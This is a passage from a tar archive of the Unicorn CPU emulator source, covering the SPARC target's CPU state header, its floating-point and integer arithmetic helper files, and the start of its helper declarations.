JPS1 NoFault */ #define SFSR_TM_BIT (1ULL << 15) /* JPS1 TLB Miss */ #define SFSR_FT_VA_IMMU_BIT (1ULL << 13) /* USIIi VA out of range (IMMU) */ #define SFSR_FT_VA_DMMU_BIT (1ULL << 12) /* USIIi VA out of range (DMMU) */ #define SFSR_FT_NFO_BIT (1ULL << 11) /* NFO page access */ #define SFSR_FT_ILL_BIT (1ULL << 10) /* illegal LDA/STA ASI */ #define SFSR_FT_ATOMIC_BIT (1ULL << 9) /* atomic op on noncacheable area */ #define SFSR_FT_NF_E_BIT (1ULL << 8) /* NF access on side effect area */ #define SFSR_FT_PRIV_BIT (1ULL << 7) /* privilege violation */ #define SFSR_PR_BIT (1ULL << 3) /* privilege mode */ #define SFSR_WRITE_BIT (1ULL << 2) /* write access mode */ #define SFSR_OW_BIT (1ULL << 1) /* status overwritten */ #define SFSR_VALID_BIT (1ULL << 0) /* status valid */ #define SFSR_ASI_SHIFT 16 /* 23:16 ASI value */ #define SFSR_ASI_MASK (0xffULL << SFSR_ASI_SHIFT) #define SFSR_CT_PRIMARY (0ULL << 4) /* 5:4 context type */ #define SFSR_CT_SECONDARY (1ULL << 4) #define SFSR_CT_NUCLEUS (2ULL << 4) #define SFSR_CT_NOTRANS (3ULL << 4) #define SFSR_CT_MASK (3ULL << 4) /* Leon3 cache control */ /* Cache control: emulate the behavior of cache control registers but without any effect on the emulated */ #define CACHE_STATE_MASK 0x3 #define CACHE_DISABLED 0x0 #define CACHE_FROZEN 0x1 #define CACHE_ENABLED 0x3 /* Cache Control register fields */ #define CACHE_CTRL_IF (1 << 4) /* Instruction Cache Freeze on Interrupt */ #define CACHE_CTRL_DF (1 << 5) /* Data Cache Freeze on Interrupt */ #define CACHE_CTRL_DP (1 << 14) /* Data cache flush pending */ #define CACHE_CTRL_IP (1 << 15) /* Instruction cache flush pending */ #define CACHE_CTRL_IB (1 << 16) /* Instruction burst fetch */ #define CACHE_CTRL_FI (1 << 21) /* Flush Instruction cache (Write only) */ #define CACHE_CTRL_FD (1 << 22) /* Flush Data cache (Write only) */ #define CACHE_CTRL_DS (1 << 23) /* Data cache snoop enable */ #define CONVERT_BIT(X, SRC, DST) \ (SRC > DST ? (X) / (SRC / DST) & (DST) : ((X) & SRC) * (DST / SRC)) typedef struct SparcTLBEntry { uint64_t tag; uint64_t tte; } SparcTLBEntry; struct CPUTimer { const char *name; uint32_t frequency; uint32_t disabled; uint64_t disabled_mask; uint32_t npt; uint64_t npt_mask; int64_t clock_offset; QEMUTimer *qtimer; }; typedef struct CPUTimer CPUTimer; typedef struct CPUSPARCState CPUSPARCState; #if defined(TARGET_SPARC64) typedef union { uint64_t mmuregs[16]; struct { uint64_t tsb_tag_target; uint64_t mmu_primary_context; uint64_t mmu_secondary_context; uint64_t sfsr; uint64_t sfar; uint64_t tsb; uint64_t tag_access; uint64_t virtual_watchpoint; uint64_t physical_watchpoint; uint64_t sun4v_ctx_config[2]; uint64_t sun4v_tsb_pointers[4]; }; } SparcV9MMU; #endif struct CPUSPARCState { target_ulong gregs[8]; /* general registers */ target_ulong *regwptr; /* pointer to current register window */ target_ulong pc; /* program counter */ target_ulong npc; /* next program counter */ target_ulong y; /* multiply/divide register */ /* emulator internal flags handling */ target_ulong cc_src, cc_src2; target_ulong cc_dst; uint32_t cc_op; target_ulong cond; /* conditional branch result (XXX: save it in a temporary register when possible) */ uint32_t psr; /* processor state register */ target_ulong fsr; /* FPU state register */ CPU_DoubleU fpr[TARGET_DPREGS]; /* floating point registers */ uint32_t cwp; /* index of current register window (extracted from PSR) */ #if !defined(TARGET_SPARC64) || defined(TARGET_ABI32) uint32_t wim; /* window invalid mask */ #endif target_ulong tbr; /* trap base register */ #if !defined(TARGET_SPARC64) int psrs; /* supervisor mode (extracted from PSR) */ int psrps; /* previous supervisor mode */ int psret; /* enable traps */ #endif uint32_t psrpil; /* interrupt blocking level */ uint32_t pil_in; /* incoming interrupt level bitmap */ #if !defined(TARGET_SPARC64) int psref; /* enable fpu */ #endif int interrupt_index; /* NOTE: we allow 8 more registers to handle wrapping */ target_ulong regbase[MAX_NWINDOWS * 16 + 8]; /* Fields up to this point are cleared by a CPU reset */ #ifdef _MSC_VER int end_reset_fields; #else struct {} end_reset_fields; #endif /* Fields from here on are preserved across CPU reset. */ target_ulong version; uint32_t nwindows; /* MMU regs */ #if defined(TARGET_SPARC64) uint64_t lsu; #define DMMU_E 0x8 #define IMMU_E 0x4 SparcV9MMU immu; SparcV9MMU dmmu; SparcTLBEntry itlb[64]; SparcTLBEntry dtlb[64]; uint32_t mmu_version; #else uint32_t mmuregs[32]; uint64_t mxccdata[4]; uint64_t mxccregs[8]; uint32_t mmubpctrv, mmubpctrc, mmubpctrs; uint64_t mmubpaction; uint64_t mmubpregs[4]; uint64_t prom_addr; #endif /* temporary float registers */ float128 qt0, qt1; float_status fp_status; #if defined(TARGET_SPARC64) #define MAXTL_MAX 8 #define MAXTL_MASK (MAXTL_MAX - 1) trap_state ts[MAXTL_MAX]; uint32_t xcc; /* Extended integer condition codes */ uint32_t asi; uint32_t pstate; uint32_t tl; uint32_t maxtl; uint32_t cansave, canrestore, otherwin, wstate, cleanwin; uint64_t agregs[8]; /* alternate general registers */ uint64_t bgregs[8]; /* backup for normal global registers */ uint64_t igregs[8]; /* interrupt general registers */ uint64_t mgregs[8]; /* mmu general registers */ uint64_t glregs[8 * MAXTL_MAX]; uint64_t fprs; uint64_t tick_cmpr, stick_cmpr; CPUTimer *tick, *stick; #define TICK_NPT_MASK 0x8000000000000000ULL #define TICK_INT_DIS 0x8000000000000000ULL uint64_t gsr; uint32_t gl; // UA2005 /* UA 2005 hyperprivileged registers */ uint64_t hpstate, htstate[MAXTL_MAX], hintp, htba, hver, hstick_cmpr, ssr; uint64_t scratch[8]; CPUTimer *hstick; // UA 2005 /* Interrupt vector registers */ uint64_t ivec_status; uint64_t ivec_data[3]; uint32_t softint; #define SOFTINT_TIMER 1 #define SOFTINT_STIMER (1 << 16) #define SOFTINT_INTRMASK (0xFFFE) #define SOFTINT_REG_MASK (SOFTINT_STIMER|SOFTINT_INTRMASK|SOFTINT_TIMER) #endif sparc_def_t def; /* Leon3 cache control */ uint32_t cache_control; void *irq_manager; void (*qemu_irq_ack)(CPUSPARCState *env, void *irq_manager, int intno); // Unicorn engine struct uc_struct *uc; }; /** * SPARCCPU: * @env: #CPUSPARCState * * A SPARC CPU. */ struct SPARCCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUSPARCState env; struct SPARCCPUClass cc; }; void sparc_cpu_do_interrupt(CPUState *cpu); hwaddr sparc_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void QEMU_NORETURN sparc_cpu_do_unaligned_access(CPUState *cpu, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); #ifdef _MSC_VER void cpu_raise_exception_ra(CPUSPARCState *, int, uintptr_t); #else void cpu_raise_exception_ra(CPUSPARCState *, int, uintptr_t) QEMU_NORETURN; #endif #ifndef NO_CPU_IO_DEFS /* cpu_init.c */ void cpu_sparc_set_id(CPUSPARCState *env, unsigned int cpu); void sparc_cpu_list(void); /* mmu_helper.c */ bool sparc_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); target_ulong mmu_probe(CPUSPARCState *env, target_ulong address, int mmulev); #if !defined(TARGET_SPARC64) int sparc_cpu_memory_rw_debug(CPUState *cpu, vaddr addr, uint8_t *buf, int len, bool is_write); #endif /* translate.c */ void sparc_tcg_init(struct uc_struct *uc); /* cpu-exec.c */ /* win_helper.c */ target_ulong cpu_get_psr(CPUSPARCState *env1); void cpu_put_psr(CPUSPARCState *env1, target_ulong val); void cpu_put_psr_raw(CPUSPARCState *env1, target_ulong val); #ifdef TARGET_SPARC64 target_ulong cpu_get_ccr(CPUSPARCState *env1); void cpu_put_ccr(CPUSPARCState *env1, target_ulong val); target_ulong cpu_get_cwp64(CPUSPARCState *env1); void cpu_put_cwp64(CPUSPARCState *env1, int cwp); void cpu_change_pstate(CPUSPARCState *env1, uint32_t new_pstate); void cpu_gl_switch_gregs(CPUSPARCState *env, uint32_t new_gl); #endif int cpu_cwp_inc(CPUSPARCState *env1, int cwp); int cpu_cwp_dec(CPUSPARCState *env1, int cwp); void cpu_set_cwp(CPUSPARCState *env1, int new_cwp); /* int_helper.c */ void leon3_irq_manager(CPUSPARCState *env, void *irq_manager, int intno); /* leon3.c */ // void leon3_irq_ack(void *irq_manager, int intno); #if defined (TARGET_SPARC64) static inline int compare_masked(uint64_t x, uint64_t y, uint64_t mask) { return (x & mask) == (y & mask); } #define MMU_CONTEXT_BITS 13 #define MMU_CONTEXT_MASK ((1 << MMU_CONTEXT_BITS) - 1) static inline int tlb_compare_context(const SparcTLBEntry *tlb, uint64_t context) { return compare_masked(context, tlb->tag, MMU_CONTEXT_MASK); } #endif #endif /* cpu-exec.c */ void sparc_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); #if defined(TARGET_SPARC64) hwaddr cpu_get_phys_page_nofault(CPUSPARCState *env, target_ulong addr, int mmu_idx); #endif int cpu_sparc_signal_handler(int host_signum, void *pinfo, void *puc); #define SPARC_CPU_TYPE_SUFFIX "-" TYPE_SPARC_CPU #define SPARC_CPU_TYPE_NAME(model) model SPARC_CPU_TYPE_SUFFIX #define CPU_RESOLVING_TYPE TYPE_SPARC_CPU #define cpu_signal_handler cpu_sparc_signal_handler #define cpu_list sparc_cpu_list /* MMU modes definitions */ #if defined (TARGET_SPARC64) #define MMU_USER_IDX 0 #define MMU_USER_SECONDARY_IDX 1 #define MMU_KERNEL_IDX 2 #define MMU_KERNEL_SECONDARY_IDX 3 #define MMU_NUCLEUS_IDX 4 #define MMU_PHYS_IDX 5 #else #define MMU_USER_IDX 0 #define MMU_KERNEL_IDX 1 #define MMU_PHYS_IDX 2 #endif #if defined (TARGET_SPARC64) static inline int cpu_has_hypervisor(CPUSPARCState *env1) { return env1->def.features & CPU_FEATURE_HYPV; } static inline int cpu_hypervisor_mode(CPUSPARCState *env1) { return cpu_has_hypervisor(env1) && (env1->hpstate & HS_PRIV); } static inline int cpu_supervisor_mode(CPUSPARCState *env1) { return env1->pstate & PS_PRIV; } #else static inline int cpu_supervisor_mode(CPUSPARCState *env1) { return env1->psrs; } #endif static inline int cpu_mmu_index(CPUSPARCState *env, bool ifetch) { #if !defined(TARGET_SPARC64) if ((env->mmuregs[0] & MMU_E) == 0) { /* MMU disabled */ return MMU_PHYS_IDX; } else { return env->psrs; } #else /* IMMU or DMMU disabled. */ if (ifetch ? (env->lsu & IMMU_E) == 0 || (env->pstate & PS_RED) != 0 : (env->lsu & DMMU_E) == 0) { return MMU_PHYS_IDX; } else if (cpu_hypervisor_mode(env)) { return MMU_PHYS_IDX; } else if (env->tl > 0) { return MMU_NUCLEUS_IDX; } else if (cpu_supervisor_mode(env)) { return MMU_KERNEL_IDX; } else { return MMU_USER_IDX; } #endif } static inline int cpu_interrupts_enabled(CPUSPARCState *env1) { #if !defined (TARGET_SPARC64) if (env1->psret != 0) return 1; #else if ((env1->pstate & PS_IE) && !cpu_hypervisor_mode(env1)) { return 1; } #endif return 0; } static inline int cpu_pil_allowed(CPUSPARCState *env1, int pil) { #if !defined(TARGET_SPARC64) /* level 15 is non-maskable on sparc v8 */ return pil == 15 || pil > env1->psrpil; #else return pil > env1->psrpil; #endif } typedef CPUSPARCState CPUArchState; typedef SPARCCPU ArchCPU; #include "exec/cpu-all.h" #ifdef TARGET_SPARC64 /* sun4u.c */ void cpu_tick_set_count(CPUTimer *timer, uint64_t count); uint64_t cpu_tick_get_count(CPUTimer *timer); void cpu_tick_set_limit(CPUTimer *timer, uint64_t limit); trap_state* cpu_tsptr(CPUSPARCState* env); #endif #define TB_FLAG_MMU_MASK 7 #define TB_FLAG_FPU_ENABLED (1 << 4) #define TB_FLAG_AM_ENABLED (1 << 5) #define TB_FLAG_SUPER (1 << 6) #define TB_FLAG_HYPER (1 << 7) #define TB_FLAG_ASI_SHIFT 24 static inline void cpu_get_tb_cpu_state(CPUSPARCState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *pflags) { uint32_t flags; *pc = env->pc; *cs_base = env->npc; flags = cpu_mmu_index(env, false); if (cpu_supervisor_mode(env)) { flags |= TB_FLAG_SUPER; } #ifdef TARGET_SPARC64 if (env->pstate & PS_AM) { flags |= TB_FLAG_AM_ENABLED; } if ((env->def.features & CPU_FEATURE_FLOAT) && (env->pstate & PS_PEF) && (env->fprs & FPRS_FEF)) { flags |= TB_FLAG_FPU_ENABLED; } flags |= env->asi << TB_FLAG_ASI_SHIFT; #else if ((env->def.features & CPU_FEATURE_FLOAT) && env->psref) { flags |= TB_FLAG_FPU_ENABLED; } #endif *pflags = flags; } static inline bool tb_fpu_enabled(int tb_flags) { return tb_flags & TB_FLAG_FPU_ENABLED; } static inline bool tb_am_enabled(int tb_flags) { #ifndef TARGET_SPARC64 return false; #else return tb_flags & TB_FLAG_AM_ENABLED; #endif } SPARCCPU *cpu_sparc_init(struct uc_struct *uc); #endif �����������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/fop_helper.c��������������������������������������������������������0000664�0000000�0000000�00000032234�14675241067�0021044�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * FPU op helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" #define QT0 (env->qt0) #define QT1 (env->qt1) static target_ulong do_check_ieee_exceptions(CPUSPARCState *env, uintptr_t ra) { target_ulong status = get_float_exception_flags(&env->fp_status); target_ulong fsr = env->fsr; if (unlikely(status)) { /* Keep exception flags clear for next time. */ set_float_exception_flags(0, &env->fp_status); /* Copy IEEE 754 flags into FSR */ if (status & float_flag_invalid) { fsr |= FSR_NVC; } if (status & float_flag_overflow) { fsr |= FSR_OFC; } if (status & float_flag_underflow) { fsr |= FSR_UFC; } if (status & float_flag_divbyzero) { fsr |= FSR_DZC; } if (status & float_flag_inexact) { fsr |= FSR_NXC; } if ((fsr & FSR_CEXC_MASK) & ((fsr & FSR_TEM_MASK) >> 23)) { CPUState *cs = env_cpu(env); /* Unmasked exception, generate a trap. Note that while the helper is marked as NO_WG, we can get away with writing to cpu state along the exception path, since TCG generated code will never see the write. */ env->fsr = fsr | FSR_FTT_IEEE_EXCP; cs->exception_index = TT_FP_EXCP; cpu_loop_exit_restore(cs, ra); } else { /* Accumulate exceptions */ fsr |= (fsr & FSR_CEXC_MASK) << 5; } } return fsr; } target_ulong helper_check_ieee_exceptions(CPUSPARCState *env) { return do_check_ieee_exceptions(env, GETPC()); } #define F_HELPER(name, p) void helper_f##name##p(CPUSPARCState *env) #define F_BINOP(name) \ float32 helper_f ## name ## s (CPUSPARCState *env, float32 src1, \ float32 src2) \ { \ return float32_ ## name (src1, src2, &env->fp_status); \ } \ float64 helper_f ## name ## d (CPUSPARCState * env, float64 src1,\ float64 src2) \ { \ return float64_ ## name (src1, src2, &env->fp_status); \ } \ F_HELPER(name, q) \ { \ QT0 = float128_ ## name (QT0, QT1, &env->fp_status); \ } F_BINOP(add); F_BINOP(sub); F_BINOP(mul); F_BINOP(div); #undef F_BINOP float64 helper_fsmuld(CPUSPARCState *env, float32 src1, float32 src2) { return float64_mul(float32_to_float64(src1, &env->fp_status), float32_to_float64(src2, &env->fp_status), &env->fp_status); } void helper_fdmulq(CPUSPARCState *env, float64 src1, float64 src2) { QT0 = float128_mul(float64_to_float128(src1, &env->fp_status), float64_to_float128(src2, &env->fp_status), &env->fp_status); } float32 helper_fnegs(float32 src) { return float32_chs(src); } #ifdef TARGET_SPARC64 float64 helper_fnegd(float64 src) { return float64_chs(src); } F_HELPER(neg, q) { QT0 = float128_chs(QT1); } #endif /* Integer to float conversion. */ float32 helper_fitos(CPUSPARCState *env, int32_t src) { return int32_to_float32(src, &env->fp_status); } float64 helper_fitod(CPUSPARCState *env, int32_t src) { return int32_to_float64(src, &env->fp_status); } void helper_fitoq(CPUSPARCState *env, int32_t src) { QT0 = int32_to_float128(src, &env->fp_status); } #ifdef TARGET_SPARC64 float32 helper_fxtos(CPUSPARCState *env, int64_t src) { return int64_to_float32(src, &env->fp_status); } float64 helper_fxtod(CPUSPARCState *env, int64_t src) { return int64_to_float64(src, &env->fp_status); } void helper_fxtoq(CPUSPARCState *env, int64_t src) { QT0 = int64_to_float128(src, &env->fp_status); } #endif #undef F_HELPER /* floating point conversion */ float32 helper_fdtos(CPUSPARCState *env, float64 src) { return float64_to_float32(src, &env->fp_status); } float64 helper_fstod(CPUSPARCState *env, float32 src) { return float32_to_float64(src, &env->fp_status); } float32 helper_fqtos(CPUSPARCState *env) { return float128_to_float32(QT1, &env->fp_status); } void helper_fstoq(CPUSPARCState *env, float32 src) { QT0 = float32_to_float128(src, &env->fp_status); } float64 helper_fqtod(CPUSPARCState *env) { return float128_to_float64(QT1, &env->fp_status); } void helper_fdtoq(CPUSPARCState *env, float64 src) { QT0 = float64_to_float128(src, &env->fp_status); } /* Float to integer conversion. */ int32_t helper_fstoi(CPUSPARCState *env, float32 src) { return float32_to_int32_round_to_zero(src, &env->fp_status); } int32_t helper_fdtoi(CPUSPARCState *env, float64 src) { return float64_to_int32_round_to_zero(src, &env->fp_status); } int32_t helper_fqtoi(CPUSPARCState *env) { return float128_to_int32_round_to_zero(QT1, &env->fp_status); } #ifdef TARGET_SPARC64 int64_t helper_fstox(CPUSPARCState *env, float32 src) { return float32_to_int64_round_to_zero(src, &env->fp_status); } int64_t helper_fdtox(CPUSPARCState *env, float64 src) { return float64_to_int64_round_to_zero(src, &env->fp_status); } int64_t helper_fqtox(CPUSPARCState *env) { return float128_to_int64_round_to_zero(QT1, &env->fp_status); } #endif float32 helper_fabss(float32 src) { return float32_abs(src); } #ifdef TARGET_SPARC64 float64 helper_fabsd(float64 src) { return float64_abs(src); } void helper_fabsq(CPUSPARCState *env) { QT0 = float128_abs(QT1); } #endif float32 helper_fsqrts(CPUSPARCState *env, float32 src) { return float32_sqrt(src, &env->fp_status); } float64 helper_fsqrtd(CPUSPARCState *env, float64 src) { return float64_sqrt(src, &env->fp_status); } void helper_fsqrtq(CPUSPARCState *env) { QT0 = float128_sqrt(QT1, &env->fp_status); } #define GEN_FCMP(name, size, reg1, reg2, FS, E) \ target_ulong glue(helper_, name) (CPUSPARCState *env) \ { \ int ret; \ target_ulong fsr; \ if (E) { \ ret = glue(size, _compare)(reg1, reg2, &env->fp_status); \ } else { \ ret = glue(size, _compare_quiet)(reg1, reg2, \ &env->fp_status); \ } \ fsr = do_check_ieee_exceptions(env, GETPC()); \ switch (ret) { \ case float_relation_unordered: \ fsr |= (FSR_FCC1 | FSR_FCC0) << FS; \ fsr |= FSR_NVA; \ break; \ case float_relation_less: \ fsr &= ~(FSR_FCC1) << FS; \ fsr |= FSR_FCC0 << FS; \ break; \ case float_relation_greater: \ fsr &= ~(FSR_FCC0) << FS; \ fsr |= FSR_FCC1 << FS; \ break; \ default: \ fsr &= ~((FSR_FCC1 | FSR_FCC0) << FS); \ break; \ } \ return fsr; \ } #define GEN_FCMP_T(name, size, FS, E) \ target_ulong glue(helper_, name)(CPUSPARCState *env, size src1, size src2)\ { \ int ret; \ target_ulong fsr; \ if (E) { \ ret = glue(size, _compare)(src1, src2, &env->fp_status); \ } else { \ ret = glue(size, _compare_quiet)(src1, src2, \ &env->fp_status); \ } \ fsr = do_check_ieee_exceptions(env, GETPC()); \ switch (ret) { \ case float_relation_unordered: \ fsr |= (FSR_FCC1 | FSR_FCC0) << FS; \ break; \ case float_relation_less: \ fsr &= ~(FSR_FCC1 << FS); \ fsr |= FSR_FCC0 << FS; \ break; \ case float_relation_greater: \ fsr &= ~(FSR_FCC0 << FS); \ fsr |= FSR_FCC1 << FS; \ break; \ default: \ fsr &= ~((FSR_FCC1 | FSR_FCC0) << FS); \ break; \ } \ return fsr; \ } GEN_FCMP_T(fcmps, float32, 0, 0); GEN_FCMP_T(fcmpd, float64, 0, 0); GEN_FCMP_T(fcmpes, float32, 0, 1); GEN_FCMP_T(fcmped, float64, 0, 1); GEN_FCMP(fcmpq, float128, QT0, QT1, 0, 0); GEN_FCMP(fcmpeq, float128, QT0, QT1, 0, 1); #ifdef TARGET_SPARC64 GEN_FCMP_T(fcmps_fcc1, float32, 22, 0); GEN_FCMP_T(fcmpd_fcc1, float64, 22, 0); GEN_FCMP(fcmpq_fcc1, float128, QT0, QT1, 22, 0); GEN_FCMP_T(fcmps_fcc2, float32, 24, 0); GEN_FCMP_T(fcmpd_fcc2, float64, 24, 0); GEN_FCMP(fcmpq_fcc2, float128, QT0, QT1, 24, 0); GEN_FCMP_T(fcmps_fcc3, float32, 26, 0); GEN_FCMP_T(fcmpd_fcc3, float64, 26, 0); GEN_FCMP(fcmpq_fcc3, float128, QT0, QT1, 26, 0); GEN_FCMP_T(fcmpes_fcc1, float32, 22, 1); GEN_FCMP_T(fcmped_fcc1, float64, 22, 1); GEN_FCMP(fcmpeq_fcc1, float128, QT0, QT1, 22, 1); GEN_FCMP_T(fcmpes_fcc2, float32, 24, 1); GEN_FCMP_T(fcmped_fcc2, float64, 24, 1); GEN_FCMP(fcmpeq_fcc2, float128, QT0, QT1, 24, 1); GEN_FCMP_T(fcmpes_fcc3, float32, 26, 1); GEN_FCMP_T(fcmped_fcc3, float64, 26, 1); GEN_FCMP(fcmpeq_fcc3, float128, QT0, QT1, 26, 1); #endif #undef GEN_FCMP_T #undef GEN_FCMP static void set_fsr(CPUSPARCState *env, target_ulong fsr) { int rnd_mode; switch (fsr & FSR_RD_MASK) { case FSR_RD_NEAREST: rnd_mode = float_round_nearest_even; break; default: case FSR_RD_ZERO: rnd_mode = float_round_to_zero; break; case FSR_RD_POS: rnd_mode = float_round_up; break; case FSR_RD_NEG: rnd_mode = float_round_down; break; } set_float_rounding_mode(rnd_mode, &env->fp_status); } target_ulong helper_ldfsr(CPUSPARCState *env, target_ulong old_fsr, uint32_t new_fsr) { old_fsr = (new_fsr & FSR_LDFSR_MASK) | (old_fsr & FSR_LDFSR_OLDMASK); set_fsr(env, old_fsr); return old_fsr; } #ifdef TARGET_SPARC64 target_ulong helper_ldxfsr(CPUSPARCState *env, target_ulong old_fsr, uint64_t new_fsr) { old_fsr = (new_fsr & FSR_LDXFSR_MASK) | (old_fsr & FSR_LDXFSR_OLDMASK); set_fsr(env, old_fsr); return old_fsr; } #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/helper.c������������������������������������������������������������0000664�0000000�0000000�00000013423�14675241067�0020177�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Misc Sparc helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" void cpu_raise_exception_ra(CPUSPARCState *env, int tt, uintptr_t ra) { CPUState *cs = env_cpu(env); cs->exception_index = tt; cpu_loop_exit_restore(cs, ra); } void helper_raise_exception(CPUSPARCState *env, int tt) { CPUState *cs = env_cpu(env); cs->exception_index = tt; cpu_loop_exit(cs); } void helper_debug(CPUSPARCState *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_DEBUG; cpu_loop_exit(cs); } #ifdef TARGET_SPARC64 void helper_tick_set_count(void *opaque, uint64_t count) { // cpu_tick_set_count(opaque, count); } uint64_t helper_tick_get_count(CPUSPARCState *env, void *opaque, int mem_idx) { return 0; #if 0 CPUTimer *timer = opaque; if (timer->npt && mem_idx < MMU_KERNEL_IDX) { cpu_raise_exception_ra(env, TT_PRIV_INSN, GETPC()); } return cpu_tick_get_count(timer); #endif } void helper_tick_set_limit(void *opaque, uint64_t limit) { // cpu_tick_set_limit(opaque, limit); } #endif static target_ulong do_udiv(CPUSPARCState *env, target_ulong a, target_ulong b, int cc, uintptr_t ra) { int overflow = 0; uint64_t x0; uint32_t x1; x0 = (a & 0xffffffff) | ((int64_t) (env->y) << 32); x1 = (b & 0xffffffff); if (x1 == 0) { cpu_raise_exception_ra(env, TT_DIV_ZERO, ra); } x0 = x0 / x1; if (x0 > UINT32_MAX) { x0 = UINT32_MAX; overflow = 1; } if (cc) { env->cc_dst = x0; env->cc_src2 = overflow; env->cc_op = CC_OP_DIV; } return x0; } target_ulong helper_udiv(CPUSPARCState *env, target_ulong a, target_ulong b) { return do_udiv(env, a, b, 0, GETPC()); } target_ulong helper_udiv_cc(CPUSPARCState *env, target_ulong a, target_ulong b) { return do_udiv(env, a, b, 1, GETPC()); } static target_ulong do_sdiv(CPUSPARCState *env, target_ulong a, target_ulong b, int cc, uintptr_t ra) { int overflow = 0; int64_t x0; int32_t x1; x0 = (a & 0xffffffff) | ((int64_t) (env->y) << 32); x1 = (b & 0xffffffff); if (x1 == 0) { cpu_raise_exception_ra(env, TT_DIV_ZERO, ra); } else if (x1 == -1 && x0 == INT64_MIN) { x0 = INT32_MAX; overflow = 1; } else { x0 = x0 / x1; if ((int32_t) x0 != x0) { x0 = x0 < 0 ? INT32_MIN : INT32_MAX; overflow = 1; } } if (cc) { env->cc_dst = x0; env->cc_src2 = overflow; env->cc_op = CC_OP_DIV; } return x0; } target_ulong helper_sdiv(CPUSPARCState *env, target_ulong a, target_ulong b) { return do_sdiv(env, a, b, 0, GETPC()); } target_ulong helper_sdiv_cc(CPUSPARCState *env, target_ulong a, target_ulong b) { return do_sdiv(env, a, b, 1, GETPC()); } #ifdef TARGET_SPARC64 int64_t helper_sdivx(CPUSPARCState *env, int64_t a, int64_t b) { if (b == 0) { /* Raise divide by zero trap. */ cpu_raise_exception_ra(env, TT_DIV_ZERO, GETPC()); } else if (b == -1) { /* Avoid overflow trap with i386 divide insn. */ return -a; } else { return a / b; } } uint64_t helper_udivx(CPUSPARCState *env, uint64_t a, uint64_t b) { if (b == 0) { /* Raise divide by zero trap. */ cpu_raise_exception_ra(env, TT_DIV_ZERO, GETPC()); } return a / b; } #endif target_ulong helper_taddcctv(CPUSPARCState *env, target_ulong src1, target_ulong src2) { target_ulong dst; /* Tag overflow occurs if either input has bits 0 or 1 set. */ if ((src1 | src2) & 3) { goto tag_overflow; } dst = src1 + src2; /* Tag overflow occurs if the addition overflows. */ if (~(src1 ^ src2) & (src1 ^ dst) & (1u << 31)) { goto tag_overflow; } /* Only modify the CC after any exceptions have been generated. */ env->cc_op = CC_OP_TADDTV; env->cc_src = src1; env->cc_src2 = src2; env->cc_dst = dst; return dst; tag_overflow: cpu_raise_exception_ra(env, TT_TOVF, GETPC()); } target_ulong helper_tsubcctv(CPUSPARCState *env, target_ulong src1, target_ulong src2) { target_ulong dst; /* Tag overflow occurs if either input has bits 0 or 1 set. */ if ((src1 | src2) & 3) { goto tag_overflow; } dst = src1 - src2; /* Tag overflow occurs if the subtraction overflows. */ if ((src1 ^ src2) & (src1 ^ dst) & (1u << 31)) { goto tag_overflow; } /* Only modify the CC after any exceptions have been generated. */ env->cc_op = CC_OP_TSUBTV; env->cc_src = src1; env->cc_src2 = src2; env->cc_dst = dst; return dst; tag_overflow: cpu_raise_exception_ra(env, TT_TOVF, GETPC()); } #ifndef TARGET_SPARC64 void helper_power_down(CPUSPARCState *env) { CPUState *cs = env_cpu(env); cs->halted = 1; cs->exception_index = EXCP_HLT; env->pc = env->npc; env->npc = env->pc + 4; cpu_loop_exit(cs); } #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/helper.h������������������������������������������������������������0000664�0000000�0000000�00000017755�14675241067�0020220�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) #ifndef TARGET_SPARC64 DEF_HELPER_1(rett, void, env) DEF_HELPER_2(wrpsr, void, env, tl) DEF_HELPER_1(rdpsr, tl, env) DEF_HELPER_1(power_down, void, env) #else DEF_HELPER_FLAGS_2(wrpil, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(wrgl, void, env, tl) DEF_HELPER_2(wrpstate, void, env, tl) DEF_HELPER_1(done, void, env) DEF_HELPER_1(retry, void, env) 